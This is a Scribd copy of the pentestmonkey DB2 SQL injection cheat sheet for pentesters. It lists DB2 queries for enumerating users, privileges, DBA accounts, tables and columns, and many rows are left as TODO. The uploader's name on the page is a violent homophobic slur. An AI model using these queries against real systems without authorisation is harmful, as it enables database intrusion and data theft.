Scribd
Upload
7 views

DB2 SQL Injection Cheat Sheet

The DB2 SQL Injection Cheat Sheet provides a collection of SQL injection techniques specifically for DB2 databases, highlighting common queries and methods for exploiting vulnerabilities. It includes commands for user enumeration, listing databases, and retrieving privileges, among others, with notes on admin-only queries. The document is a work-in-progress and aims to assist pentesters in identifying and exploiting SQL injection vulnerabilities in DB2 applications.

Uploaded by

faggotkilla
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
7 views

DB2 SQL Injection Cheat Sheet

The DB2 SQL Injection Cheat Sheet provides a collection of SQL injection techniques specifically for DB2 databases, highlighting common queries and methods for exploiting vulnerabilities. It includes commands for user enumeration, listing databases, and retrieving privileges, among others, with notes on admin-only queries. The document is a work-in-progress and aims to assist pentesters in identifying and exploiting SQL injection vulnerabilities in DB2 applications.

Uploaded by

faggotkilla
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

pentestmonkey

Taking the monkey work out of pentesting

DB2 SQL Injection Cheat Sheet


Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience. When you
Categories do find one, though it pays to be prepared…

Blog (78)
Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were
Cheat Sheets (10)
performed on DB2 8.2 under Windows.
Shells (1)
This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it
SQL Injection (7)
easier to read and to use the same table for for each database backend. This helps to highlight any features which are
lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to
Contact (2) researching yet.
Site News (3)
The complete list of SQL Injection Cheat Sheets I’m working is:
Tools (17)
Audit (3) Oracle
Misc (7) MSSQL
MySQL
User Enumeration (4) PostgreSQL
Web Shells (3) Ingres
DB2
Uncategorized (3) Informix

Yaptest (15) I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.

Front End (1) Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the
Installing (2) query.
Overview (2)
Version select versionnumber, version_timestamp from sysibm.sysversions;
Using (8)
Comments select blah from foo; — comment like this
RSS Feed

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Current User select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;

List Users N/A (I think DB2 uses OS-level user accounts for authentication.)Database
authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;

List Password N/A (I think DB2 uses OS-level user accounts for authentication.)
Hashes

List Privileges select * from syscat.tabauth; — privs on tables


select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select * from SYSIBM.SYSUSERAUTH – List db2 system privilegies

List DBA Accounts select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or
SYSADMAUTH = ‘G’

Current Database select current server from sysibm.sysdummy1;

List Databases SELECT schemaname FROM syscat.schemata;

List Columns select name, tbname, coltype from sysibm.syscolumns;

List Tables select name from sysibm.systables;

Find Tables From select tbname from sysibm.syscolumns where name=’username’


Column Name

Select Nth Row select name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

Select Nth Char SELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1; — returns b

Bitwise AND This page seems to indicate that DB2 has no support for bitwise operators!

ASCII Value -> select chr(65) from sysibm.sysdummy1; — returns ‘A’


Char

Char -> ASCII select ascii(‘A’) from sysibm.sysdummy1; — returns 65


Value

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Casting SELECT cast(’123′ as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;

String SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’
Concatenation select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’

If Statement TODO

Case Statement TODO

Avoiding Quotes TODO

Time Delay ???See Heavy Queries article for some ideas.

Make DNS TODO


Requests

Command TODO
Execution

Local File Access TODO

Hostname, IP TODO
Address

Location of DB files TODO

Default/System TODO
Databases

This page will probably remain a work-in-progress for some time yet. I’ll update it as I learn more.

Thanks
Pentestmonkey gratefully acknowledges the contributions of:

r22mvk

Adrián for figuring out lots of the TODO items above:


http://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/

Tags: cheatsheet, database, db2, pentest, sqlinjection

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Posted in SQL Injection

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

You might also like